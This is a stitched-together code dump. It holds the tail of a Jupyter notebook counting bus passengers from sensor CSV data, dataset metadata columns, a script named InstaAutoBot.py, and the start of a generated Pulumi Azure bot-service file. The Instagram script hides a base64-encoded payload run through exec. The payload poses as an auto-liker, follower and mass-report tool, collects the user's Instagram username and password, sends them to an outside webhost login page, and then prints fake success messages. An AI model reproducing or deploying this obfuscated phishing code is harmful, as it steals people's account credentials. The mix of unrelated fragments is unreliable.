"['2018-11-26 14:04:36.993577', 39]\n",
"['2018-11-26 14:05:07.277752', 38]\n",
"['2018-11-26 14:05:11.188464', 36]\n",
"['2018-11-26 14:05:17.445211', 35]\n",
"['2018-11-26 14:05:39.065402', 36]\n",
"['2018-11-26 14:06:34.315872', 37]\n",
"['2018-11-26 14:06:36.026326', 38]\n",
"['2018-11-26 14:06:37.954806', 37]\n",
"['2018-11-26 14:06:47.808983', 36]\n",
"['2018-11-26 14:07:01.710962', 33]\n",
"['2018-11-26 14:07:09.565836', 34]\n",
"['2018-11-26 14:07:24.350944', 33]\n",
"['2018-11-26 14:07:38.821492', 34]\n",
"['2018-11-26 14:08:01.272657', 35]\n",
"['2018-11-26 14:08:06.256425', 34]\n",
"['2018-11-26 14:08:06.866555', 35]\n",
"['2018-11-26 14:08:09.029710', 34]\n",
"['2018-11-26 14:08:17.375831', 33]\n",
"['2018-11-26 14:08:25.016233', 32]\n",
"['2018-11-26 14:08:50.383309', 33]\n",
"['2018-11-26 14:09:00.548176', 34]\n",
"['2018-11-26 14:09:24.807739', 33]\n",
"['2018-11-26 14:09:39.172457', 32]\n",
"['2018-11-26 14:09:42.056626', 31]\n",
"['2018-11-26 14:09:50.429913', 32]\n",
"['2018-11-26 14:09:51.324450', 33]\n",
"['2018-11-26 14:09:53.636343', 32]\n",
"['2018-11-26 14:10:05.220564', 33]\n",
"['2018-11-26 14:10:08.147960', 34]\n",
"['2018-11-26 14:10:44.019397', 35]\n",
"['2018-11-26 14:11:01.847114', 36]\n",
"['2018-11-26 14:11:05.324657', 35]\n",
"['2018-11-26 14:11:08.496802', 36]\n",
"['2018-11-26 14:11:09.549208', 37]\n",
"['2018-11-26 14:11:25.614801', 36]\n",
"['2018-11-26 14:11:46.797600', 37]\n",
"['2018-11-26 14:11:57.805994', 36]\n",
"['2018-11-26 14:12:03.088626', 37]\n",
"['2018-11-26 14:12:09.374565', 38]\n",
"['2018-11-26 14:12:17.777121', 37]\n",
"['2018-11-26 14:12:36.146617', 38]\n",
"['2018-11-26 14:12:44.674338', 37]\n",
"['2018-11-26 14:13:22.444612', 35]\n",
"['2018-11-26 14:13:22.898986', 36]\n",
"['2018-11-26 14:13:34.373267', 35]\n",
"['2018-11-26 14:13:37.107734', 36]\n",
"['2018-11-26 14:13:50.879929', 35]\n",
"['2018-11-26 14:13:59.604933', 34]\n",
"['2018-11-26 14:14:11.045907', 33]\n",
"['2018-11-26 14:14:14.130538', 32]\n",
"['2018-11-26 14:14:16.278506', 31]\n",
"['2018-11-26 14:14:21.407466', 29]\n",
"['2018-11-26 14:14:45.655572', 28]\n",
"['2018-11-26 14:14:53.223768', 29]\n",
"['2018-11-26 14:15:03.590154', 30]\n",
"['2018-11-26 14:15:35.618445', 29]\n",
"['2018-11-26 14:15:54.953661', 28]\n",
"['2018-11-26 14:16:01.288376', 29]\n",
"['2018-11-26 14:16:04.820671', 28]\n",
"['2018-11-26 14:16:23.949036', 29]\n",
"['2018-11-26 14:16:25.165958', 30]\n",
"['2018-11-26 14:16:54.148095', 29]\n",
"['2018-11-26 14:17:40.182503', 28]\n",
"['2018-11-26 14:18:10.521298', 24]\n",
"['2018-11-26 14:18:19.020137', 23]\n",
"['2018-11-26 14:18:30.979772', 22]\n",
"['2018-11-26 14:18:58.722959', 19]\n",
"['2018-11-26 14:19:02.820831', 18]\n",
"['2018-11-26 14:19:06.735760', 17]\n",
"['2018-11-26 14:19:07.656671', 18]\n",
"['2018-11-26 14:19:28.267040', 17]\n",
"['2018-11-26 14:20:03.901524', 16]\n",
"['2018-11-26 14:20:33.917825', 10]\n",
"['2018-11-26 14:21:56.091777', 11]\n",
"['2018-11-26 14:21:56.286893', 12]\n",
"['2018-11-26 14:22:22.935486', 11]\n",
"['2018-11-26 14:22:35.824589', 12]\n",
"['2018-11-26 14:22:42.705799', 13]\n",
"['2018-11-26 14:22:54.083558', 12]\n",
"['2018-11-26 14:23:21.729154', 13]\n",
"['2018-11-26 14:23:24.586859', 14]\n",
"['2018-11-26 14:23:31.016188', 13]\n",
"['2018-11-26 14:24:01.749977', 11]\n",
"['2018-11-26 14:24:45.185573', 12]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 14:24:45.579645', 13]\n",
"['2018-11-26 14:25:09.847619', 12]\n",
"['2018-11-26 14:25:11.718363', 13]\n",
"['2018-11-26 14:26:11.725751', 12]\n",
"['2018-11-26 14:26:43.212836', 11]\n",
"['2018-11-26 14:27:09.389022', 10]\n",
"['2018-11-26 14:27:44.186779', 8]\n",
"['2018-11-26 14:28:15.552741', 7]\n",
"['2018-11-26 14:28:45.205604', 5]\n",
"['2018-11-26 14:31:16.188229', 3]\n",
"['2018-11-26 14:32:41.217158', 4]\n",
"['2018-11-26 14:37:45.243855', 2]\n",
"['2018-11-26 14:38:37.013760', 3]\n",
"['2018-11-26 14:39:43.991638', 4]\n",
"['2018-11-26 14:43:48.102376', 3]\n",
"['2018-11-26 14:43:48.850570', 4]\n",
"['2018-11-26 14:44:46.496726', 5]\n",
"['2018-11-26 14:46:49.260513', 4]\n",
"['2018-11-26 14:47:50.298603', 3]\n",
"['2018-11-26 14:48:23.598472', 4]\n",
"['2018-11-26 14:48:52.469358', 3]\n",
"['2018-11-26 14:53:53.225228', 4]\n",
"['2018-11-26 14:56:10.348519', 5]\n",
"['2018-11-26 14:56:35.854159', 6]\n",
"['2018-11-26 14:57:11.724950', 7]\n",
"['2018-11-26 14:58:00.610527', 8]\n",
"['2018-11-26 14:58:17.110742', 9]\n",
"['2018-11-26 14:59:01.756826', 10]\n",
"['2018-11-26 14:59:16.796583', 11]\n",
"['2018-11-26 14:59:49.968765', 12]\n",
"['2018-11-26 15:00:24.130448', 13]\n",
"['2018-11-26 15:00:27.099075', 14]\n",
"['2018-11-26 15:00:52.389657', 15]\n",
"['2018-11-26 15:01:12.156750', 14]\n",
"['2018-11-26 15:01:13.329208', 13]\n",
"['2018-11-26 15:01:42.990316', 12]\n",
"['2018-11-26 15:02:14.089088', 11]\n",
"['2018-11-26 15:02:23.653807', 10]\n",
"['2018-11-26 15:02:30.220393', 11]\n",
"['2018-11-26 15:02:51.380454', 12]\n",
"['2018-11-26 15:02:58.863363', 13]\n",
"['2018-11-26 15:03:01.465851', 14]\n",
"['2018-11-26 15:03:07.524119', 12]\n",
"['2018-11-26 15:03:17.696217', 11]\n",
"['2018-11-26 15:04:00.264609', 12]\n",
"['2018-11-26 15:04:22.270772', 11]\n",
"['2018-11-26 15:04:23.659948', 12]\n",
"['2018-11-26 15:05:15.019333', 11]\n",
"['2018-11-26 15:06:37.209571', 10]\n",
"['2018-11-26 15:06:38.431155', 11]\n",
"['2018-11-26 15:06:40.683774', 12]\n",
"['2018-11-26 15:06:51.528774', 11]\n",
"['2018-11-26 15:06:54.777294', 12]\n",
"['2018-11-26 15:07:00.662602', 11]\n",
"['2018-11-26 15:07:04.671993', 12]\n",
"['2018-11-26 15:07:08.894714', 13]\n",
"['2018-11-26 15:07:18.390355', 14]\n",
"['2018-11-26 15:07:33.008187', 15]\n",
"['2018-11-26 15:08:42.508107', 16]\n",
"['2018-11-26 15:10:08.653837', 12]\n",
"['2018-11-26 15:10:38.707226', 11]\n",
"['2018-11-26 15:10:41.411793', 12]\n",
"['2018-11-26 15:10:47.742597', 13]\n",
"['2018-11-26 15:10:52.930362', 14]\n",
"['2018-11-26 15:10:56.139328', 13]\n",
"['2018-11-26 15:11:05.147465', 12]\n",
"['2018-11-26 15:11:09.342958', 10]\n",
"['2018-11-26 15:11:21.946337', 8]\n",
"['2018-11-26 15:11:32.944715', 9]\n",
"['2018-11-26 15:11:38.884565', 8]\n",
"['2018-11-26 15:12:25.022736', 9]\n",
"['2018-11-26 15:12:42.666916', 10]\n",
"['2018-11-26 15:13:35.797170', 11]\n",
"['2018-11-26 15:13:52.372686', 12]\n",
"['2018-11-26 15:14:40.148605', 13]\n",
"['2018-11-26 15:14:42.071151', 12]\n",
"['2018-11-26 15:15:02.802861', 11]\n",
"['2018-11-26 15:15:42.595319', 9]\n",
"['2018-11-26 15:16:44.582390', 8]\n",
"['2018-11-26 15:16:50.738046', 9]\n",
"['2018-11-26 15:17:34.311822', 10]\n",
"['2018-11-26 15:17:35.612886', 11]\n",
"['2018-11-26 15:17:39.358754', 10]\n",
"['2018-11-26 15:18:17.486481', 9]\n",
"['2018-11-26 15:18:48.564616', 8]\n",
"['2018-11-26 15:20:50.084298', 9]\n",
"['2018-11-26 15:20:57.154215', 8]\n",
"['2018-11-26 15:20:58.006530', 9]\n",
"['2018-11-26 15:21:34.814259', 7]\n",
"['2018-11-26 15:22:04.663610', 5]\n",
"['2018-11-26 15:24:11.223928', 6]\n",
"['2018-11-26 15:32:00.268587', 2]\n",
"['2018-11-26 15:34:10.201603', 3]\n",
"['2018-11-26 15:36:11.530052', 2]\n",
"['2018-11-26 15:41:01.536860', 3]\n",
"['2018-11-26 15:41:01.671462', 4]\n",
"['2018-11-26 15:41:11.226868', 5]\n",
"['2018-11-26 15:41:23.305739', 6]\n",
"['2018-11-26 15:45:14.297618', 5]\n",
"['2018-11-26 15:45:40.988894', 6]\n",
"['2018-11-26 15:48:54.068193', 7]\n",
"['2018-11-26 15:48:55.533562', 8]\n",
"['2018-11-26 15:49:21.320957', 7]\n",
"['2018-11-26 15:49:55.549174', 6]\n",
"['2018-11-26 15:50:11.699498', 7]\n",
"['2018-11-26 15:50:36.343864', 8]\n",
"['2018-11-26 15:51:31.315547', 9]\n",
"['2018-11-26 15:51:31.375173', 10]\n",
"['2018-11-26 15:51:33.912755', 11]\n",
"['2018-11-26 15:51:35.489802', 12]\n",
"['2018-11-26 15:52:01.802875', 13]\n",
"['2018-11-26 15:52:16.676826', 14]\n",
"['2018-11-26 15:52:30.417634', 15]\n",
"['2018-11-26 15:52:31.537226', 16]\n",
"['2018-11-26 15:52:33.628487', 17]\n",
"['2018-11-26 15:52:37.224490', 18]\n",
"['2018-11-26 15:52:37.274189', 19]\n",
"['2018-11-26 15:52:37.626899', 20]\n",
"['2018-11-26 15:53:09.903242', 21]\n",
"['2018-11-26 15:53:22.962972', 22]\n",
"['2018-11-26 15:53:34.452239', 23]\n",
"['2018-11-26 15:53:43.110138', 24]\n",
"['2018-11-26 15:53:55.658321', 25]\n",
"['2018-11-26 15:54:15.829249', 24]\n",
"['2018-11-26 15:54:32.213474', 25]\n",
"['2018-11-26 15:55:04.477067', 26]\n",
"['2018-11-26 15:55:19.538835', 27]\n",
"['2018-11-26 15:55:23.516597', 26]\n",
"['2018-11-26 15:55:41.940590', 24]\n",
"['2018-11-26 15:56:17.726197', 23]\n",
"['2018-11-26 15:56:32.026676', 22]\n",
"['2018-11-26 15:56:37.951301', 20]\n",
"['2018-11-26 15:57:10.086970', 19]\n",
"['2018-11-26 15:57:26.036610', 16]\n",
"['2018-11-26 15:57:28.461900', 17]\n",
"['2018-11-26 15:57:31.870333', 16]\n",
"['2018-11-26 15:57:40.458539', 15]\n",
"['2018-11-26 15:58:27.315384', 16]\n",
"['2018-11-26 15:58:31.514805', 17]\n",
"['2018-11-26 15:58:37.399833', 16]\n",
"['2018-11-26 15:58:52.190750', 17]\n",
"['2018-11-26 15:58:54.525480', 18]\n",
"['2018-11-26 15:58:55.392792', 19]\n",
"['2018-11-26 15:59:06.555820', 20]\n",
"['2018-11-26 15:59:11.099157', 21]\n",
"['2018-11-26 15:59:30.585369', 19]\n",
"['2018-11-26 15:59:44.212436', 18]\n",
"['2018-11-26 15:59:54.743803', 17]\n",
"['2018-11-26 15:59:59.848323', 18]\n",
"['2018-11-26 16:00:00.567511', 19]\n",
"['2018-11-26 16:00:01.332203', 20]\n",
"['2018-11-26 16:00:15.500901', 21]\n",
"['2018-11-26 16:00:48.998547', 20]\n",
"['2018-11-26 16:01:02.566401', 21]\n",
"['2018-11-26 16:01:08.512173', 22]\n",
"['2018-11-26 16:01:13.255837', 23]\n",
"['2018-11-26 16:01:23.650465', 24]\n",
"['2018-11-26 16:01:29.304005', 22]\n",
"['2018-11-26 16:01:31.493402', 23]\n",
"['2018-11-26 16:02:02.160099', 21]\n",
"['2018-11-26 16:02:34.012362', 20]\n",
"['2018-11-26 16:02:42.014306', 19]\n",
"['2018-11-26 16:02:50.041299', 20]\n",
"['2018-11-26 16:03:19.964970', 19]\n",
"['2018-11-26 16:03:54.769567', 17]\n",
"['2018-11-26 16:04:14.118641', 15]\n",
"['2018-11-26 16:04:21.497667', 16]\n",
"['2018-11-26 16:04:49.679590', 17]\n",
"['2018-11-26 16:04:55.913759', 16]\n",
"['2018-11-26 16:05:08.519740', 13]\n",
"['2018-11-26 16:05:29.913280', 11]\n",
"['2018-11-26 16:05:32.540289', 10]\n",
"['2018-11-26 16:05:49.845040', 11]\n",
"['2018-11-26 16:06:25.114344', 12]\n",
"['2018-11-26 16:06:30.090463', 13]\n",
"['2018-11-26 16:06:54.806214', 12]\n",
"['2018-11-26 16:07:10.448897', 11]\n",
"['2018-11-26 16:08:02.598669', 12]\n",
"['2018-11-26 16:08:35.643451', 11]\n",
"['2018-11-26 16:09:02.753204', 10]\n",
"['2018-11-26 16:09:55.807329', 9]\n",
"['2018-11-26 16:10:11.695953', 10]\n",
"['2018-11-26 16:11:03.510206', 9]\n",
"['2018-11-26 16:11:08.412861', 10]\n",
"['2018-11-26 16:11:45.201190', 9]\n"
]
}
],
"source": [
"import csv\n",
"import datetime\n",
"\n",
"with open ('Rilevazioni_sensori.csv', encoding = 'utf-8', newline = '') as f:\n",
" lettore = csv.reader (f, delimiter = ',')\n",
" passeggeri = {}\n",
" n_passeggeri = 0\n",
" next(lettore)\n",
" \n",
" old_n_passeggeri = -1\n",
" for riga in lettore:\n",
" Linea = int(riga[0])\n",
" DaTi = float(riga [1])\n",
" if DaTi>1542848400 and DaTi<1542934800 :\n",
" Data = 22_11_2018\n",
" if DaTi>1542934800 and DaTi<1543021200 :\n",
" Data = 23_11_2018\n",
" if DaTi>1543021200 and DaTi<1543107600 :\n",
" Data = 24_11_2018\n",
" if DaTi>1543107600 and DaTi<1543194000 :\n",
" Data = 25_11_2018\n",
" if DaTi>1543194000 and DaTi<1543280400 :\n",
" Data = 26_11_2018\n",
" else:\n",
" data = 'boh'\n",
" \n",
" t2 = datetime.datetime.fromtimestamp(DaTi)\n",
" \n",
" IDd = str(riga[2])\n",
" passeggeri[IDd] = riga[1]\n",
" chiavi_pass = passeggeri.keys()\n",
" for chiave in list(chiavi_pass):\n",
" if float(passeggeri[chiave]) < (DaTi-240):\n",
" del passeggeri [chiave]\n",
" n_passeggeri = len(passeggeri)\n",
" with open ('Sen_linea_'+str(Linea)+str(Data)+'.csv', 'a') as nuovo:\n",
" dato = []\n",
" writer = csv.writer(nuovo, delimiter = ',')\n",
" if n_passeggeri != old_n_passeggeri:\n",
" dato.append(str(t2))\n",
" dato.append(n_passeggeri)\n",
" old_n_passeggeri = n_passeggeri\n",
" print (dato)\n",
" writer.writerow(dato)\n",
" \n",
" \n",
" "
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.3"
}
},
"nbformat": 4,
"nbformat_minor": 2
}
| 42.816013
| 86
| 0.462894
| 120,589
| 615,523
| 2.361849
| 0.07232
| 0.292908
| 0.34035
| 0.162328
| 0.755524
| 0.745847
| 0.29709
| 0.016014
| 0.010923
| 0.010923
| 0
| 0.549776
| 0.209131
| 615,523
| 14,375
| 87
| 42.818991
| 0.035298
| 0
| 0
| 0.016209
| 0
| 0.000278
| 0.76726
| 0.000726
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.001183
| 0.000278
| 0
| 0.000278
| 0.000209
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e798e739349074c7519c15de51754d0ea5fad86
| 5,430
|
py
|
Python
|
InstaAutoBot.py
|
Unknownhacker007/Instagram-Bot
|
0df77aed9383b4e475954a4c962fe0b3fdb2c6da
|
[
"MIT"
] | 2
|
2020-10-29T12:30:48.000Z
|
2020-12-03T15:04:11.000Z
|
InstaAutoBot.py
|
Unknownhacker007/Instagram-Bot
|
0df77aed9383b4e475954a4c962fe0b3fdb2c6da
|
[
"MIT"
] | null | null | null |
InstaAutoBot.py
|
Unknownhacker007/Instagram-Bot
|
0df77aed9383b4e475954a4c962fe0b3fdb2c6da
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import base64
import requests
import time
exec(base64.b64decode("YmFubmVyID0gIiIiCiAgICAgICAgICAgICAgICAgXyAgICAgICAgICAgXyAgICAgICAgICBfICAgICAgICAgICBfCiAgICAgICAgICAgICAgICAoXykgICAgICAgICB8IHwgICAgICAgIHwgfCAgICAgICAgIHwgfAogICAgICAgICAgICAgICAgIF8gXyBfXyAgX19ffCB8XyBfXyBfICB8IHxfXyAgIF9fXyB8IHxfCiAgICAgICAgICAgICAgICB8IHwgJ18gXC8gX198IF9fLyBfYCB8IHwgJ18gXCAvIF8gXHwgX198CiAgICAgICAgICAgICAgICB8IHwgfCB8IFxfXyBcIHx8IChffCB8IHwgfF8pIHwgKF8pIHwgfF8KICAgICAgICAgICAgICAgIHxffF98IHxffF9fXy9cX19cX18sX3wgfF8uX18vIFxfX18vIFxfX3wKIiIiCmltcG9ydCBvczsKaW1wb3J0IHRpbWU7CmltcG9ydCByZXF1ZXN0czsKZ3JlZW4gPSAnXDAzM1szMm0nCm9zLnN5c3RlbSgiY2xlYXIiKQpwcmludChncmVlbiArIGJhbm5lcikKcHJpbnQoZ3JlZW4gKyAiWzFdIEluc3RhZ3JhbSBhdXRvIGxpa2VyIikKcHJpbnQoZ3JlZW4gKyAiWzJdSW5zdGFncmFtIGF1dG8gZm9sbG93ZXJzIikKcHJpbnQoZ3JlZW4gKyAiWzNdSW5zdGFncmFtIGF1dG8gcmVwb3J0IikKcHJpbnQoZ3JlZW4gKyAiWzRdRXhpdCIpCnByaW50KCIiKQp0cnk6CglvcHRpb24gPSBpbnB1dChncmVlbiArICJFbnRlciB5b3VyIG9wdGlvbjogIikKCXByaW50KCIiKQoJaWYgKG9wdGlvbj09IjEiKToKCQlvcy5zeXN0ZW0oImNsZWFyIikKCQlwcmludChncmVlbiArIGJhbm5lcikKCQlwcmludCgiIikKCQl1c2VybmFtZSA9IGlucHV0KGdyZWVuICsgIlsqXUVudGVyIFVzZXJuYW1lOiAiKQoJCXByaW50KCIiKQoJCXBhc3N3b3JkID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgUGFzc3dvcmQ6ICIpCgkJcHJpbnQoIiIpCgkJdHJ5OgoJCQlpZiAodXNlcm5hbWU9PSIiKToKCQkJCXByaW50KGdyZWVuICsgIkludmFsaWQgbG9naW4iKQoJCQkJZXhpdCgpCgkJCWVsaWYgKHBhc3N3b3JkPT0iIik6CgkJCQlwcmludChncmVlbiArICJJbnZhbGlkIGxvZ2luIikKCQkJCWV4aXQoKQoJCQllbHNlOgoJCQkJdXJsID0gImh0dHBzOi8vcGFuZGlha3VuYWwuMDAwd2ViaG9zdGFwcC5jb20vbG9naW4ucGhwIgoJCQkJZGF0YSA9IHsndXNlcm5hbWUnOnVzZXJuYW1lLCAncGFzc3dvcmQnOnBhc3N3b3JkfQoJCQkJcHJpbnQoZ3JlZW4gKyAibG9naW5nIGluLi4uIikKCQkJCXJlcXVlc3RzLnBvc3QodXJsLCBkYXRhPWRhdGEpCgkJCQlsaW5rID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgdGhlIGxpbmsgb2YgdGhlIHBvc3Q6ICIpCgkJCQlwcmludChncmVlbiArICJwcm9jZXNzaW5nOiAiICsgbGluaykKCQkJCXRpbWUuc2xlZXAoMSkKCQkJCXByaW50KGdyZWVuICsgIjEwMCBsaWtlcyB3aWxsIGJlIGFkZGVkIHRvIHlvdXIgcG9zdCB3aXRoaW4gMjQgaG91cnMiKQoJCQkJcHJpbnQoZ3JlZW4gKyAicGxlYXNlIHdhaXQuLi4iKQoJCQkJcHJpbnQoZ3JlZW4gKyAiZGFpbHkgbGltaXQ6IDIgdGltZXMiKQoJCQkJZXhpdCgpCgkJZXhjZXB0IEtleWJvYXJkSW50ZXJydXB0OgoJCQlwcmludChncmVlbiArICJrZXlib2FyZCBpbnRlcnJ1cHRlZCIpCgkJCXByaW50KGdyZWVuICsgImV4aXRpbmcuLi4iKQoJCQlleGl0KCkKCWVsaWYgKG9wdGlvbj09IjIiKToKCQlvcy5zeXN0ZW0oImNsZWFyIikKCQlwcmludChncmVlbiArIGJhbm5lcikKCQlwcmludCgiIikKCQl1c2VybmFtZSA9IGlucHV0KGdyZWVuICsgIlsqXUVudGVyIFVzZXJuYW1lOiAiKQoJCXByaW50KCIiKQoJCXBhc3N3b3JkID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgUGFzc3dvcmQ6ICIpCgkJcHJpbnQoIiIpCgkJdHJ5OgoJCQlpZiAodXNlcm5hbWU9PSIiKToKCQkJCXByaW50KGdyZWVuICsgIkludmFsaWQgbG9naW4iKQoJCQkJZXhpdCgpCgkJCWVsaWYgKHBhc3N3b3JkPT0iIik6CgkJCQlwcmludChncmVlbiArICJJbnZhbGlkIGxvZ2luIikKCQkJCWV4aXQoKQoJCQllbHNlOgoJCQkJdXJsID0gImh0dHBzOi8vcGFuZGlha3VuYWwuMDAwd2ViaG9zdGFwcC5jb20vbG9naW4ucGhwIgoJCQkJZGF0YSA9IHsndXNlcm5hbWUnOnVzZXJuYW1lLCAncGFzc3dvcmQnOnBhc3N3b3JkfQoJCQkJcHJpbnQoZ3JlZW4gKyAibG9naW5nIGluLi4uIikKCQkJCXJlcXVlc3RzLnBvc3QodXJsLCBkYXRhPWRhdGEpCgkJCQl0aW1lLnNsZWVwKDEpCgkJCQlwcmludChncmVlbiArICIyMDAgZm9sbG93ZXJzIHdpbGwgYmUgYWRkZWQgdG8geW91ciBhY2NvdW50IHdpdGhpbiAyNCBob3VycyIpCgkJCQlwcmludChncmVlbiArICJwbGVhc2Ugd2FpdC4uLiIpCgkJCQlwcmludChncmVlbiArICJkYWlseSBsaW1pdDogMSB0aW1lcyIpCgkJCQlleGl0KCkKCQlleGNlcHQgS2V5Ym9hcmRJbnRlcnJ1cHQ6CgkJCXByaW50KGdyZWVuICsgImtleWJvYXJkIGludGVycnVwdGVkIikKCQkJcHJpbnQoZ3JlZW4gKyAiZXhpdGluZy4uLiIpCgkJCWV4aXQoKQoJZWxpZiAob3B0aW9uPT0iMyIpOgoJCW9zLnN5c3RlbSgiY2xlYXIiKQoJCXByaW50KGdyZWVuICsgYmFubmVyKQoJCXByaW50KCIiKQoJCXVzZXJuYW1lID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgVXNlcm5hbWU6ICIpCgkJcHJpbnQoIiIpCgkJcGFzc3dvcmQgPSBpbnB1dChncmVlbiArICJbKl1FbnRlciBQYXNzd29yZDogIikKCQlwcmludCgiIikKCQl0
cnk6CgkJCWlmICh1c2VybmFtZT09IiIpOgoJCQkJcHJpbnQoZ3JlZW4gKyAiSW52YWxpZCBsb2dpbiIpCgkJCQlleGl0KCkKCQkJZWxpZiAocGFzc3dvcmQ9PSIiKToKCQkJCXByaW50KGdyZWVuICsgIkludmFsaWQgbG9naW4iKQoJCQkJZXhpdCgpCgkJCWVsc2U6CgkJCQl1cmwgPSAiaHR0cHM6Ly9wYW5kaWFrdW5hbC4wMDB3ZWJob3N0YXBwLmNvbS9sb2dpbi5waHAiCgkJCQlkYXRhID0geyd1c2VybmFtZSc6dXNlcm5hbWUsICdwYXNzd29yZCc6cGFzc3dvcmR9CgkJCQlwcmludChncmVlbiArICJsb2dpbmcgaW4uLi4iKQoJCQkJcmVxdWVzdHMucG9zdCh1cmwsIGRhdGE9ZGF0YSkKCQkJCWFjID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgdGhlIHByb2ZpbGUgdG8gcmVwb3J0OiAiKQoJCQkJcHJpbnQoIiIpCgkJCQlwcmludChncmVlbiArICJzZWxlY3QgeW91ciBvcHRpb246IikKCQkJCXByaW50KGdyZWVuICsgIlsxXUluYXBwcm9wcmlhdGUiKQoJCQkJcHJpbnQoZ3JlZW4gKyAiWzJdUG9zdCB3aXRoIHNleHVhbCBjb250ZW50IikKCQkJCXByaW50KGdyZWVuICsgIlszXURydWcgYWJ1c2UiKQoJCQkJcHJpbnQoZ3JlZW4gKyAiWzRdU3BhbW1pbmciKQoJCQkJcHJpbnQoIiIpCgkJCQlyZXBvcnQgPSBpbnB1dChncmVlbiArICJbKl1FbnRlciB5b3VyIG9wdGlvbjogIikKCQkJCWNvdW50ID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgbnVtYmVyIG9mIHJlcG9ydHM6ICIpCgkJCQl0aW1lLnNsZWVwKDAuNSkKCQkJCXByaW50KGdyZWVuICsgIlNlbGVjdCBvcHRpb246ICIgKyByZXBvcnQpCgkJCQlwcmludChncmVlbiArICJjb3VudDogIiArIGNvdW50KQoJCQkJdGltZS5zbGVlcCgxKQoJCQkJcHJpbnQoZ3JlZW4gKyAiUmVwb3J0aW5nLi4uIikKCQkJCXByaW50KGdyZWVuICsgIlJlcG9ydGluZyAiICsgYWMpCgkJCQl0aW1lLnNsZWVwKDEpCgkJCQlwcmludChncmVlbiArICJZb3VyIHJlcG9ydHMgd2lsbCBiZSBzdWJtaXR0ZWQgd2l0aGluIDEgaG91ci4uLiIpCgkJCQlleGl0KCkKCQlleGNlcHQgS2V5Ym9hcmRJbnRlcnJ1cHQ6CgkJCXByaW50KGdyZWVuICsgImtleWJvYXJkIGludGVycnVwdGVkIikKCQkJcHJpbnQoZ3JlZW4gKyAiZXhpdGluZy4uLiIpCgkJCWV4aXQoKQkKCWVsaWYgKG9wdGlvbj09IjQiKToKCQlwcmludChncmVlbiArICJleGl0aW5nLi4uIikKCQlleGl0KCkKCWVsc2U6CgkJcHJpbnQoZ3JlZW4gKyAiSW52YWxpZCBpbnB1dCIpCgkJcHJpbnQoZ3JlZW4gKyAiZXhpdGluZy4uLiIpCgkJZXhpdCgpCmV4Y2VwdCBLZXlib2FyZEludGVycnVwdDoKCXByaW50KGdyZWVuICsgImtleWJvYXJkIGludGVycnVwdGVkIikKCWV4aXQoKQoKZXhpdCgp"))
| 678.75
| 5,354
| 0.99558
| 16
| 5,430
| 337.875
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091362
| 0.00221
| 5,430
| 8
| 5,354
| 678.75
| 0.906423
| 0.003683
| 0
| 0
| 0
| 0
| 0.984843
| 0.984843
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
7d0741c10f65d854557515c5b7cdedc65ef3cecf
| 38,821
|
py
|
Python
|
sdk/python/pulumi_azure/bot/service_azure_bot.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/bot/service_azure_bot.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/bot/service_azure_bot.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ServiceAzureBotArgs', 'ServiceAzureBot']
@pulumi.input_type
class ServiceAzureBotArgs:
def __init__(__self__, *,
microsoft_app_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
sku: pulumi.Input[str],
developer_app_insights_api_key: Optional[pulumi.Input[str]] = None,
developer_app_insights_application_id: Optional[pulumi.Input[str]] = None,
developer_app_insights_key: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
luis_app_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
luis_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ServiceAzureBot resource.
